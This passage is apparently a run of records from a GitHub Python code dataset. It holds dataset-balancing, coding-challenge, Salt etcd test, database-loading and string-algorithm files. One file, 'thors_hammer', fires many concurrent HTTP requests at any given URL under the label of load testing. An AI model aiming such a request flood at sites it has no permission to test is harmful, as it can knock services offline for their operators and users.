pd.DataFrame(img_record, columns=columns)\n\n return df_img_record\n\ndef count_list(column_str, df): # count each column \n count_record = []\n columns = [column_str, 'count']\n all_count = df[column_str].values.tolist()\n all_count_set = set(all_count) \n for item in all_count_set:\n count_record.append([item, all_count.count(item)]) \n df_count = pd.DataFrame(count_record, columns=columns)\n \n return 
df_count\n\ndef count_list_by_label(key, column_str, df): # count description by key\n all_key = df[key].values.tolist()\n all_key_set = set(all_key)\n df_key_list, df_str_key = [], []\n \n for item in all_key_set:\n _df = []\n filter_key = (df[key] == item)\n item_count = df[filter_key][column_str].values.tolist()\n item_count_set = set(item_count)\n for item1 in item_count_set:\n _df.append([item1, item_count.count(item1)])\n df_key_list.append(_df)\n df_str_key.append(item)\n \n return df_str_key, df_key_list\n\ndef get_ramdom_img(img_filter_index, each_key_num, df, save_image_dir, image_times):\n random_img_index = random.sample(img_filter_index, each_key_num)\n# print('random_idx: ' + str(random_img_index))\n for ran_idx in range(len(random_img_index)):\n _kb_model = df.iloc[random_img_index[ran_idx]]['kb_model']\n _image_path = df.iloc[random_img_index[ran_idx]]['img_path']\n _image_name = os.path.basename(_image_path)\n _image_label = df.iloc[random_img_index[ran_idx]]['label']\n _save_image_dir = os.path.join(save_image_dir, _kb_model, _image_label)\n \n if image_times:\n _image_name = '%s_%s.jpg' % (os.path.splitext(_image_name)[0], image_times)\n _save_image_file = os.path.join(_save_image_dir, _image_name)\n else:\n _save_image_file = _save_image_dir\n \n \n if not os.path.exists(_save_image_dir):\n os.makedirs(_save_image_dir)\n if not os.path.exists(os.path.join(_save_image_dir, _image_name)):\n shutil.copy(_image_path, _save_image_file)\n\ndef get_times_img(img_filter_index, df, save_image_dir, image_times):\n for filter_idx in range(len(img_filter_index)):\n _kb_model = df.iloc[img_filter_index[filter_idx]]['kb_model']\n _image_path = df.iloc[img_filter_index[filter_idx]]['img_path']\n _image_name = os.path.basename(_image_path)\n _image_label = df.iloc[img_filter_index[filter_idx]]['label']\n _save_image_dir = os.path.join(save_image_dir, _kb_model, _image_label)\n\n for times_idx in range(image_times):\n _image_times_name = '%s_%s.jpg' % (os.path.splitext(_image_name)[0], times_idx)\n if not os.path.exists(_save_image_dir):\n os.makedirs(_save_image_dir)\n if not os.path.exists(os.path.join(_save_image_dir, _image_times_name)):\n shutil.copy(_image_path, os.path.join(_save_image_dir, _image_times_name))\n\ndef get_balance_img(key, column_str, key_list_idx, df, save_image_dir):\n error_record = []\n columns = [column_str, 'count']\n key_num = len(key_list_idx)\n df_key = pd.DataFrame(key_list_idx, columns=columns)\n# key_image_num = int(df_key['count'].sum())\n if key == 'OK':\n each_key_num = int(df_key['count'].median())\n else:\n each_key_num = int(df_key['count'].mean())\n #each_key_num = 50\n\n print('each_key_num: ' + str(each_key_num) + '; desc_num: ' + str(len(key_list_idx)))\n\n for key_idx in range(key_num):\n filter_key = ((df[column_str] == df_key[column_str][key_idx]) \n & (df['label'] == key))\n img_filter = df[filter_key]\n img_filter_index = img_filter.index.values.tolist()\n\n if len(img_filter) >= each_key_num:\n if key == 'OK' :\n get_ramdom_img(img_filter_index, each_key_num, df, save_image_dir, 0)\n else:\n get_ramdom_img(img_filter_index, len(img_filter), df, save_image_dir, 0)\n \n print(key_idx, '/', key_num,'count: ' + str(len(img_filter_index)))\n \n else:\n try:\n _image_times = int(each_key_num / len(img_filter_index))\n _image_remainder = int(each_key_num % len(img_filter_index))\n except:\n _image_times = 0\n _image_remainder = 0\n print('No img, label: ', key, ' desc:', df_key[column_str][key_idx])\n error_record.append([key, 
df_key[column_str][key_idx]]) \n \n print(key_idx, '/', key_num,'count: ' + str(len(img_filter_index)) + ' times: ' + str(_image_times) + ' remainder: ' + str(_image_remainder))\n get_times_img(img_filter_index, df, save_image_dir, _image_times) \n if _image_remainder :\n get_ramdom_img(img_filter_index, _image_remainder, df, save_image_dir, _image_times)\n else: pass\n fp_w = open(os.path.join(save_image_dir, 'balance_result.txt'), 'a+')\n fp_w.write(str(key) +' each_key_num: ' + str(each_key_num) + '; desc_num: ' + str(len(key_list_idx)) + '\\n')\n fp_w.close()\n df_error = pd.DataFrame(error_record, columns = ['label', 'discription'])\n df_error.to_csv(os.path.join(save_image_dir, 'img_error_record.csv'), header = True, index = False)\n df_key.to_csv( os.path.join(save_image_dir, '%s_count.csv' % key), header = True, index = False)\n \n \n\ndef balance_by_desciption(image_dir, save_image_dir, csv_path):\n\n\n \n df_csv = collect_roi(csv_path)\n# print(len(df_csv))\n df_img_record = df_img(image_dir, df_csv) \n df_desc_label, df_label_list = count_list_by_label('label', 'description', df_img_record)\n for i in range(len(df_desc_label)):\n print('label: ', df_desc_label[i], 'desc: ', len(df_label_list[i]))\n \n \n# =============================================================================\n# \n# #-----all image parameter\n# df_desc_count = count_list('description', df_img_record)\n# \n# tatol_image_num = len(df_img_record)\n# total_location_num = len(df_desc_count)\n# print(tatol_image_num)\n# print(total_location_num)\n# =============================================================================\n \n for idx in range(len(df_label_list)):\n if df_desc_label[idx] == 'OK':\n print(df_desc_label[idx])\n get_balance_img('OK', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'NG':\n print(df_desc_label[idx])\n get_balance_img('NG', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'UNCONFIRMED':\n print(df_desc_label[idx])\n get_balance_img('UNCONFIRMED', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'MISS':\n print(df_desc_label[idx])\n get_balance_img('MISS', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'POOR':\n print(df_desc_label[idx])\n get_balance_img('POOR', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'SHIFT':\n print(df_desc_label[idx])\n get_balance_img('SHIFT', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'WRONG':\n print(df_desc_label[idx])\n get_balance_img('WRONG', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'SHORT':\n print(df_desc_label[idx])\n get_balance_img('SHORT', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'SHIFT1':\n print(df_desc_label[idx])\n get_balance_img('SHIFT1', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'SHIFT2':\n print(df_desc_label[idx])\n get_balance_img('SHIFT2', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'EMPTY':\n print(df_desc_label[idx])\n get_balance_img('EMPTY', 'description', df_label_list[idx], df_img_record, save_image_dir)\n else:\n print('other label: ' + str(df_desc_label[idx]))\n \n df_img_record.to_csv( os.path.join(save_image_dir, 'img_count.csv'), 
header = True, index = False)\n\n\nif __name__ == '__main__': \n image_dir = r'/media/swpcserver/DISK2/Hazel/MultiClass/P1_MergeP3poor/datasets2'\n save_image_dir = r'/media/swpcserver/DISK2/Hazel/MultiClass/P1_MergeP3poor/balance'\n csv_path = r'/media/swpcserver/DISK2/Hazel/MultiClass/P1_MergeP3poor/ROI' \n balance_by_desciption(image_dir, save_image_dir, csv_path)\n\n","repo_name":"huiling-weng/git_test","sub_path":"balance/balance_Img.py","file_name":"balance_Img.py","file_ext":"py","file_size_in_byte":10808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23490332834","text":"# https://www.codewars.com/kata/515de9ae9dcfc28eb6000001\n# Complete the solution so that it splits the string into pairs of two characters. \n# If the string contains an odd number of characters then it should replace the \n# missing second character of the final pair with an underscore ('_').\n\ndef solution(s):\n l = len(s)\n if l % 2 == 1:\n s += '_'\n l += 1\n arr = []\n for x in range(0,l-1, 2):\n arr.append(s[x:x+2])\n return arr\n","repo_name":"aritrakar/codewars","sub_path":"5,6 kyu/SplitStrings.py","file_name":"SplitStrings.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"23491153285","text":"# cook your dish here\nfor t in range(int(input())):\n \n ts = int(input())\n temp = ts\n cnt = 0\n \n while(ts % 2 == 0):\n ts /= 2\n cnt += 1\n \n js = int((temp) // (2**(cnt+1)))\n \n print(js)\n \n\n\n# from math import ceil, floor, pow\n\n# T = float(input())\n \n# while (T > 0) :\n \n# ts = float(input())\n# temp = float(ts)\n \n# cnt = 1\n \n# if ts % 2 == 1:\n# print(int(ts//2))\n# T -= 1\n# continue\n \n# while ts % int(pow(2, cnt)) == 0:\n# cnt += 1\n \n# print(int(temp // pow(2, cnt)))\n \n# T = T - 1\n \n# # print(T)","repo_name":"Rajeevveera24/coding","sub_path":"competitive_programming/codechef/long_challenge/2020/June_2020/EOEO.py","file_name":"EOEO.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31297974510","text":"width=50\nheight=50\nepoch=10000\nbatch=256\ntrain_dir='train'\ntest_dir='dark'\npretrained_path='pretrained/model.ckpt-2'\nmodel_ckpt = 'weightfile/model.ckpt'\ncharset='0123456789ABCDEFGHJKLMNPQRSTUVWXYZ'\nnum_class=len(charset)\n","repo_name":"wushilian/CNN_OCR","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"19276385963","text":"\ndef get_features(line):\n\tvowelPairs, conPairs = vowelConsPairs(line)\n\n\twords = set(line.split())\n\n\tfeatures = {\n\t\t\t\t\"cvRatio\":\t\tvowelConsRatio(line),\n\t\t\t\t\"averageLen\":\tavgWordLen(line),\n\t\t\t\t\"vowelPairs\":\tvowelPairs,\n\t\t\t\t\"conPairs\"\t:\tconPairs,\n\t\t\t\t\"letterPairs\":\tletterPairs(line),\n\t\t\t\t\"endsInEN\"\t:\tendsIn(\"en\",line),\n\t\t\t\t\"containsHET\":\t0 if \"het\" in words else 1,\n\t\t\t\t\"containsDE\":\t0 if \"de\" in words else 1,\n\t\t\t\t\"containsOF\":\t1 if \"of\" in line else 0,\n\t\t\t\t\"containsTHE\":\t1 if \"the\" in line else 0,\n\t\t\t\t\"containsAND\":\t1 if \"and\" in line else 0,\n\t\t\t}\n\treturn features\n\n\ndef vowelConsPairs(line):\n\n\tvowels = (\"a\",\"e\",\"i\",\"o\",\"u\")\n\tvCount = cCount = 0\n\tindex = 0\n\t\t\n\twhile index < len(line)-1:\n\t\tchar = 
line[index]\n\t\tnextChar = line[index+1]\n\n\t\tif char in vowels and char == nextChar:\n\t\t\tvCount += 1\n\t\t\tindex += 2\n\t\telif char == nextChar:\n\t\t\tcCount += 1\n\t\t\tindex += 2\n\t\telse:\n\t\t\tindex += 1\n\tif vCount > 2:\n\t\tV = 0\n\telse:\n\t\tV = 1\n\tif cCount > 2:\n\t\tC = 1\n\telse:\n\t\tC = 0\n\treturn V,C\n\n\n\ndef vowelConsRatio(line):\n\tvowels = (\"a\",\"e\",\"i\",\"o\",\"u\")\n\tvCount = cCount = 0\n\n\tfor char in line:\n\t\tif char in vowels:\n\t\t\tvCount += 1\n\t\telse:\n\t\t\tcCount += 1\n\n\tratio = vCount/cCount\n\tratio *= 100\t\n\tif int(ratio) > 40:\n\t\treturn 0\n\telse:\n\t\treturn 1\n\n\ndef avgWordLen(line):\n\n\ttotalCount = 0\n\n\tfor words in line:\n\t\tif words.isdigit():\n\t\t\tpass\n\t\telse:\n\t\t\ttotalCount += 1\n\n\tavg = totalCount // len(line.split())\n\n\tif avg > 3:\n\t\treturn 0\n\telse:\n\t\treturn 1\n\n\ndef endsIn(string,line):\n\tline = line.split()\n\tfor word in line:\n\t\tif len(word) < len(string):\n\t\t\tcontinue\n\n\t\tdiff = len(word) - len(string)\n\t\tflag = 1\n\n\t\tfor char in string:\n\t\t\tif word[diff] != char:\n\t\t\t\tflag = 0\n\t\t\t\tbreak\n\t\t\tdiff += 1\n\t\tif flag:\n\t\t\treturn flag\n\n\treturn 0\n\n\ndef letterPairs(line):\n\t\n\tcount = 0\n\tfor i in range(len(line)-1):\n\t\tchar = line[i]\n\t\tnextChar = line[i+1]\n\n\t\tif char == nextChar:\n\t\t\tcount += 1\n\tif count > 3:\n\t\treturn 0\n\telse:\n\t\treturn 1\n","repo_name":"sharjeel6392/Classification-of-language","sub_path":"dataParsing.py","file_name":"dataParsing.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12851910134","text":"import logging\n\nimport pytest\n\nimport salt.returners.etcd_return as etcd_return\nimport salt.utils.json\nfrom salt.utils.etcd_util import get_conn\nfrom tests.support.pytest.etcd import * # pylint: disable=wildcard-import,unused-wildcard-import\n\ndocker = pytest.importorskip(\"docker\")\n\nlog = logging.getLogger(__name__)\n\npytestmark = [\n pytest.mark.skip_if_binaries_missing(\"docker\", \"dockerd\", check_all=False),\n]\n\n\n@pytest.fixture\ndef configure_loader_modules(minion_opts):\n return {\n etcd_return: {\n \"__opts__\": minion_opts,\n },\n }\n\n\n@pytest.fixture(scope=\"module\")\ndef update_etcd_profile(profile_name, prefix, etcd_profile):\n etcd_profile.update(\n {\n \"etcd.returner\": profile_name,\n \"etcd.returner_root\": prefix,\n }\n )\n\n return etcd_profile\n\n\n@pytest.fixture(scope=\"module\")\ndef minion_config_overrides(update_etcd_profile):\n return update_etcd_profile\n\n\n@pytest.fixture(scope=\"module\")\ndef etcd_client(minion_opts, profile_name):\n return get_conn(minion_opts, profile=profile_name)\n\n\n@pytest.fixture(scope=\"module\")\ndef prefix():\n return \"/salt/pillar/test\"\n\n\n@pytest.fixture(autouse=True)\ndef cleanup_prefixed_entries(etcd_client, prefix):\n \"\"\"\n Cleanup after each test to ensure a consistent starting state.\n \"\"\"\n try:\n assert etcd_client.get(prefix, recurse=True) is None\n yield\n finally:\n etcd_client.delete(prefix, recurse=True)\n\n\ndef test_returner(prefix, etcd_client):\n \"\"\"\n Test returning values to etcd\n \"\"\"\n ret = {\n \"id\": \"test-id\",\n \"jid\": \"123456789\",\n \"single-key\": \"single-value\",\n \"dict-key\": {\n \"dict-subkey-1\": \"subvalue-1\",\n \"dict-subkey-2\": \"subvalue-2\",\n },\n }\n etcd_return.returner(ret)\n assert etcd_client.get(\"/\".join((prefix, \"minions\", ret[\"id\"]))) == ret[\"jid\"]\n 
expected = {key: salt.utils.json.dumps(ret[key]) for key in ret}\n assert (\n etcd_client.get(\"/\".join((prefix, \"jobs\", ret[\"jid\"], ret[\"id\"])), recurse=True)\n == expected\n )\n\n\ndef test_save_and_get_load():\n \"\"\"\n Test saving a data load to etcd\n \"\"\"\n jid = \"123456789\"\n load = {\n \"single-key\": \"single-value\",\n \"dict-key\": {\n \"dict-subkey-1\": \"subvalue-1\",\n \"dict-subkey-2\": \"subvalue-2\",\n },\n }\n etcd_return.save_load(jid, load)\n assert etcd_return.get_load(jid) == load\n\n\ndef test_get_jid():\n \"\"\"\n Test getting the return for a given jid\n \"\"\"\n jid = \"123456789\"\n ret = {\n \"id\": \"test-id-1\",\n \"jid\": jid,\n \"single-key\": \"single-value\",\n \"dict-key\": {\n \"dict-subkey-1\": \"subvalue-1\",\n \"dict-subkey-2\": \"subvalue-2\",\n },\n \"return\": \"test-return-1\",\n }\n etcd_return.returner(ret)\n\n ret = {\"id\": \"test-id-2\", \"jid\": jid, \"return\": \"test-return-2\"}\n etcd_return.returner(ret)\n\n expected = {\n \"test-id-1\": {\"return\": \"test-return-1\"},\n \"test-id-2\": {\"return\": \"test-return-2\"},\n }\n assert etcd_return.get_jid(jid) == expected\n\n\ndef test_get_fun():\n \"\"\"\n Test getting the latest fn run for each minion and matching to a target fn\n \"\"\"\n ret = {\n \"id\": \"test-id-1\",\n \"jid\": \"1\",\n \"single-key\": \"single-value\",\n \"dict-key\": {\n \"dict-subkey-1\": \"subvalue-1\",\n \"dict-subkey-2\": \"subvalue-2\",\n },\n \"return\": \"test-return-1\",\n \"fun\": \"test.ping\",\n }\n etcd_return.returner(ret)\n\n ret = {\n \"id\": \"test-id-2\",\n \"jid\": \"2\",\n \"return\": \"test-return-2\",\n \"fun\": \"test.collatz\",\n }\n etcd_return.returner(ret)\n\n expected = {\n \"test-id-2\": \"test.collatz\",\n }\n assert etcd_return.get_fun(\"test.collatz\") == expected\n\n\ndef test_get_jids():\n \"\"\"\n Test getting all jids\n \"\"\"\n ret = {\n \"id\": \"test-id-1\",\n \"jid\": \"1\",\n }\n etcd_return.returner(ret)\n\n ret = {\n \"id\": \"test-id-2\",\n \"jid\": \"2\",\n }\n etcd_return.returner(ret)\n\n retval = etcd_return.get_jids()\n assert len(retval) == 2\n assert \"1\" in retval\n assert \"2\" in retval\n\n\ndef test_get_minions():\n \"\"\"\n Test getting a list of minions\n \"\"\"\n ret = {\n \"id\": \"test-id-1\",\n \"jid\": \"1\",\n }\n etcd_return.returner(ret)\n\n ret = {\n \"id\": \"test-id-2\",\n \"jid\": \"2\",\n }\n etcd_return.returner(ret)\n\n retval = etcd_return.get_minions()\n assert len(retval) == 2\n assert \"test-id-1\" in retval\n assert \"test-id-2\" in retval\n","repo_name":"saltstack/salt","sub_path":"tests/pytests/functional/returners/test_etcd_return.py","file_name":"test_etcd_return.py","file_ext":"py","file_size_in_byte":4606,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"12122540851","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n#\n# Author : Viacheslav Zamaraev\n# email : zamaraev@gmail.com\n# Script Name : 01_csv_to_pg.py\n# Created : 03 August 2020\n# Last Modified\t: 03 August 2020\n# Version\t\t : 1.0\n# PIP : pip install tqdm peewee psycopg2 psycopg2-binary\n# RESULT : csv file with columns: FILENAME;...LASTACCESS\n# Modifications\t: 1.1 -\n# : 1.2 -\n#\n# Description : get lines in each csv fle in folder and put to PG\n# In PSQL:\n# create database udatadb2;\n# create user udatauser2 with encrypted password 'secret_password';\n# grant all privileges on database udatadb2 to udatauser2;\n\nimport os # Load the Library Module\nimport os.path\nfrom datetime import 
datetime\nimport csv\nimport logging\nfrom itertools import (takewhile, repeat)\n\ntry:\n from tqdm import tqdm\nexcept Exception as e:\n print(\"Exception occurred \" + str(e))\n print(\"try: pip install tqdm\")\n\n# non standard packages\ntry:\n from peewee import *\nexcept Exception as e:\n print(\"Exception occurred \" + str(e))\n print(\"try: pip install peewee\")\n\n\n#from . import cfg # some global configurations\n#from . import gfiletools # some global configurations\nimport cfg\nimport gfiletools\nimport models\n\n#from src.models import Udata\n\n\n\n\n\ndef get_extension(filename=''):\n basename = os.path.basename(filename) # os independent\n ffile = filename.split('\\\\').pop().split('/').pop()\n ext = '.'.join(ffile.split('.')[1:])\n\n if len(ext):\n return '.' + ext if ext else None\n else:\n return ''\n\n\ndef get_file_name_with_extension(path=''):\n # ext = get_extension(path)\n return os.path.split(path)[1]\n # if len(ext):\n # return path.split('\\\\').pop().split('/')[0]\n # else:\n # return path.split('\\\\').pop().split('/').pop()\n\n # return path.split('\\\\').pop().split('/')[0] # path.split('\\\\').pop().split('/').pop().rsplit('.', 1)[0]\n\n\ndef get_file_name_without_extension(path=''):\n ext = get_extension(path)\n if len(ext):\n return path.split('\\\\').pop().split('/').pop().rsplit(ext, 1)[0]\n else:\n return path.split('\\\\').pop().split('/').pop()\n # return path.split('\\\\').pop().split('/').pop().rsplit(get_extension(path), 1)[0]\n\n\ndef file_rows_count(filename):\n rowcount = 0\n try:\n f = open(filename, 'rb')\n bufgen = takewhile(lambda x: x, (f.raw.read(1024 * 1024) for _ in repeat(None)))\n rowcount = sum(buf.count(b'\\n') for buf in bufgen)\n return rowcount\n except Exception as e:\n ss = \"Exception occurred file_rows_count\" + str(e)\n print(ss)\n logging.error(ss)\n return rowcount\n\n\ndef csv_file_out_create():\n csv_dict = cfg.csv_dict\n file_csv = str(os.path.join(gfiletools.get_output_directory(), cfg.file_csv)) # from cfg.file\n # Если выходной CSV файл существует - удаляем его\n if os.path.isfile(file_csv):\n os.remove(file_csv)\n with open(file_csv, 'w', newline='', encoding='utf-8') as csv_file: # Just use 'w' mode in 3.x\n csv_file_open = csv.DictWriter(csv_file, csv_dict.keys(), delimiter=cfg.csv_delimiter)\n csv_file_open.writeheader()\n\n\ndef get_list_csv_dir(dir_input=''):\n listdir = []\n try:\n for root, subdirs, files in os.walk(dir_input):\n for file in os.listdir(root):\n file_path = str(os.path.join(root, file))\n # .lower() - под линуксом есть разница!!!\n ext = '.'.join(file.split('.')[1:]).lower()\n file_name = file.lower()\n if os.path.isfile(file_path) and file_name.endswith('.csv'): # ext == \"csv\":\n # print(file_path)\n listdir.append(file_path)\n except Exception as e:\n ss = \"Exception occurred get_list_csv_dir\" + str(e)\n print(ss)\n logging.error(ss)\n return listdir\n\n\n'''\n PG Create tables\n'''\ndef pg_create_tables():\n pass\n # # db = SqliteDatabase('zsniigg.db')\n # db = peewee.PostgresqlDatabase(cfg.database, host=cfg.host, port='5432', user=cfg.user, password=cfg.user_password,\n # autocommit=True, autorollback=True) # )\n # # db = PostgresqlDatabase(cfg.database, user=cfg.user, password=cfg.user_password) # host=cfg.host )\n # # db.autorollback = True\n # db.connect()\n # try:\n # db.create_tables([models.Udata], safe=True)\n # except peewee.InternalError as px:\n # print(str(px))\n\n # db.drop_tables([Udata])\n\n\n\n'''\n Do many csv files and make one csv file big\n'''\ndef 
csv_file_to_pg(filename_with_path=''):\n csv_dict = cfg.csv_dict\n dir_out = gfiletools.get_output_directory()\n file_csv = str(os.path.join(dir_out, cfg.file_csv))\n # db = PostgresqlDatabase(cfg.database, host=cfg.host, port=None, user=cfg.user, password=cfg.user_password,\n # autocommit=True, autorollback=True) # )\n # db.connect()\n\n\n\n\n\n\n\ndef do_multithreading(dir_input=''):\n list_csv = get_list_csv_dir(dir_input)\n dir_out = gfiletools.get_output_directory()\n # for f in list_csv:\n # csv_file_to_pg(f)\n csv_file_to_pg(list_csv[1])\n # csv_file_to_pg(list_csv[2])\n # csv_file_to_pg(list_csv[5])\n # csv_file_to_pg(list_csv[6])\n # csv_file_to_pg(list_csv[27])\n # csv_file_to_pg(list_csv[28])\n\n\n\n# ---------------- do main --------------------------------\ndef main():\n time1 = datetime.now()\n print('Starting at :' + str(time1))\n\n dir_input = gfiletools.get_input_directory()\n csv_file_out_create()\n gfiletools.do_log_file()\n pg_create_tables()\n\n do_multithreading(dir_input)\n\n time2 = datetime.now()\n print('Finishing at :' + str(time2))\n print('Total time : ' + str(time2 - time1))\n print('DONE !!!!')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gloryvictory/Udata2","sub_path":"src/01_csv_to_pg.py","file_name":"01_csv_to_pg.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17049512564","text":"from contextlib import contextmanager\n\nfrom cookiecutter.utils import rmtree\n\n\n@contextmanager\ndef bake_in_temp_dir(cookies, *args, **kwargs):\n\n result = cookies.bake(*args, **kwargs)\n\n try:\n yield result\n finally:\n rmtree(str(result.project))\n\n\ndef test_bake_with_defaults(cookies):\n\n with bake_in_temp_dir(cookies) as result:\n\n assert result.project.isdir()\n assert result.exit_code == 0\n assert result.exception is None\n","repo_name":"benjcunningham/cookiecutter-profile-dashboard","sub_path":"tests/test_bake_project.py","file_name":"test_bake_project.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40678313791","text":"#!/usr/bin/python3.4\n#written by pseudophed (The Great)\n# o7 bitches #\n\nimport urllib.request, datetime, argparse, queue, threading, multiprocessing\n\nparser = argparse.ArgumentParser(prog='thors_hammer', description='Load test web sites or web applications')\nparser.add_argument('-u', action='store', dest='url', required=True)\nparser.add_argument('-n', action='store', type=int, dest='total_requests', help='Total requests to make to the server. 
Default is 10')\nparser.add_argument('-c', action='store', type=int, dest='conc_conn', help='Total number of concurrent connections to make')\nparser.add_argument('-v', action='version', version='%(prog)s 1.0')\ncommandArgs = parser.parse_args()\n\nrequests = multiprocessing.Queue()\nq = multiprocessing.JoinableQueue()\ntotal_reqs = -5\n\n\ndef load_test():\n \n while not q.empty():\n if q.qsize() % 1000 == 0:\n print('{} requests left to perform...'.format(q.qsize()))\n testUrl = q.get()\n# print(testUrl)\n try:\n response = urllib.request.urlopen(testUrl)\n response.readall()\n requests.put('whoop')\n #print(requests)\n except Exception as err:\n# print(err)\n pass\n \n #print(requests.qsize())\n q.task_done()\n \ndef load_queue(queueSize, testUrl):\n\n for x in range(queueSize):\n q.put(testUrl)\n #q.close()\n #print(q.qsize())\n\ndef run():\n \n if commandArgs.total_requests:\n total_requests = commandArgs.total_requests\n else:\n total_requests = 10 \n \n print('Load testing {}:'.format(commandArgs.url)) \n load_queue(total_requests, commandArgs.url)\n \n# print('q.qsize: {}'.format(q.qsize()))\n \n if commandArgs.conc_conn:\n concurrent = commandArgs.conc_conn\n else:\n concurrent = 1\n\n for a in range(concurrent):\n p = multiprocessing.Process(target=load_test)\n# p.daemon = True\n p.start()\n \n p.join()\n\n# print('run loop: {}'.format(requests.qsize()))\n\ndef main():\n \n startTime = datetime.datetime.now()\n \n run() \n\n# print('main loop: {}'.format(requests.qsize()))\n \n print('Processed {} successful requests out of {} requests performed ({}% success rate) in {} seconds.'.format(requests.qsize(), commandArgs.total_requests,str((requests.qsize()/commandArgs.total_requests) * 100),str((datetime.datetime.now() - startTime).total_seconds())))\n\n\n\nif __name__ == '__main__' :\n main()","repo_name":"pseudophed/thors_hammer","sub_path":"thors_hammer.py","file_name":"thors_hammer.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"44728902473","text":"from sofia.resolvers import AttributeResolver\n\n\nclass SyncResolver(AttributeResolver):\n\n ATTRIBUTE = 'sync'\n\n def resolve_out(self, ins):\n \"\"\"\n Determine which stream the output is synchronised with. If the incoming streams have different sync values, then\n it is unknown what synchronisation the outgoing stream should have. \n :param ins: dictionary of the incoming streams' sync values\n :return: \n \"\"\"\n values = set()\n for value in ins.values():\n values.update(value)\n if len(values) > 1:\n msg = 'Unable to resolve sync stream. Consider adding a custom resolver to {}.'\n raise ValueError(msg.format(self.step.name))\n return {key: values for key in self.step.outs}\n","repo_name":"childsish/sofia","sub_path":"templates/genomics/attributes/sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"10737997850","text":"def longest_common_substr_non_contiguous(S1, S2, n, m):\n \"\"\"\n Find largest common sub-string non-contiguous. E.g. for inputs\n S1 = \"ABCDGH\", S2 = \"ACDGHR\", output should be 5 (ACDGH)\n \"\"\"\n # go progressively through each character of S1, and of S2. 
At each\n len_of_longest_subsequence = [([0] * (n + 1)) for i in range(m + 1)]\n\n for i_1 in range(n + 1): # index i_1 of S1\n for i_2 in range(m + 1): # index i_2 of S2\n # consider the longest_subsequence (i_1, i_2) between S1[:k_1] and S2[:k_2]\n if (i_1 - 1 < 0) or (i_1 - 1 < 0): # no character: have no started going through strings\n pass # the length of the longest subsequence is 0 since there is no character\n elif S1[i_1 - 1] == S2[i_2 - 1]:\n # there is a match: can add new element to previous longest common subsequence to make\n # a longer subsequence\n len_of_longest_subsequence[i_2][i_1] = len_of_longest_subsequence[i_2 - 1][i_1 - 1] + 1\n else:\n # there is no matcH; the new longest subsequence with i_1, i2 elements is either the previous one\n # with i_1 - 1, i_2, or i_1, i_2 - 1\n len_of_longest_subsequence[i_2][i_1] = max(\n len_of_longest_subsequence[i_2][i_1 - 1],\n len_of_longest_subsequence[i_2 - 1][i_1]\n )\n # the overall longest subsequence is the one using all the elements at our disposal\n return len_of_longest_subsequence[-1][-1]\n\n\n\ndef largest_common_substr_contiguous(S1, S2, n, m):\n \"\"\"\n Tabulated implementation\n \"\"\"\n # go progressively through each character of S1, and of S2. At each step, record the length of the longest possible\n # substring that finishes at this item (if any)\n # Create a table to store lengths of\n # longest common suffixes of substrings.\n # Note that LCSuff[i][j] contains the\n # length of longest common suffix of\n # X[0...i-1] and Y[0...j-1]. The first\n # row and first column entries have no\n # logical meaning, they are used only\n # for simplicity of the program.\n ans = 0\n len_of_longest_subsequence = [([0] * (n + 1)) for i in range(m + 1)]\n for i_2 in range(m + 1): # index i_1 of S1\n for i_1 in range(n + 1): # index i_2 of S2\n # consider the longest_subsequence (i_1, i_2) between S1[:k_1] and S2[:k_2]\n if (i_1 == 0) or (i_2 == 0): # no character: have no started going through strings\n pass # the length of the longest subsequence is 0 since there is no character\n elif S1[i_1 - 1] == S2[i_2 - 1]:\n # there is a match: can add new element to previous longest common subsequence to make\n # a longer subsequence\n len_of_longest_subsequence[i_2][i_1] = len_of_longest_subsequence[i_2 - 1][i_1 - 1] + 1\n ans = max(ans, len_of_longest_subsequence[i_2][i_1])\n # the overall longest subsequence is the one using all the elements at our disposal\n return ans\n\n\ndef lcs_contiguous_memoized(X, Y, m, n, dp):\n \"\"\" Source: https://www.geeksforgeeks.org/longest-common-subsequence-dp-4/ \"\"\"\n if (m == 0 or n == 0):\n return 0\n\n if (dp[m][n] != -1):\n return dp[m][n] # we already computed the longest substring finishing at X[m] using X[:m] and Y[:n]\n\n if X[m - 1] == Y[n - 1]:\n # there is a match, so longest substring finishing at X[m] using X[:m] and Y[:n] must be 1 + the longest\n # substring finishing at X[m] using 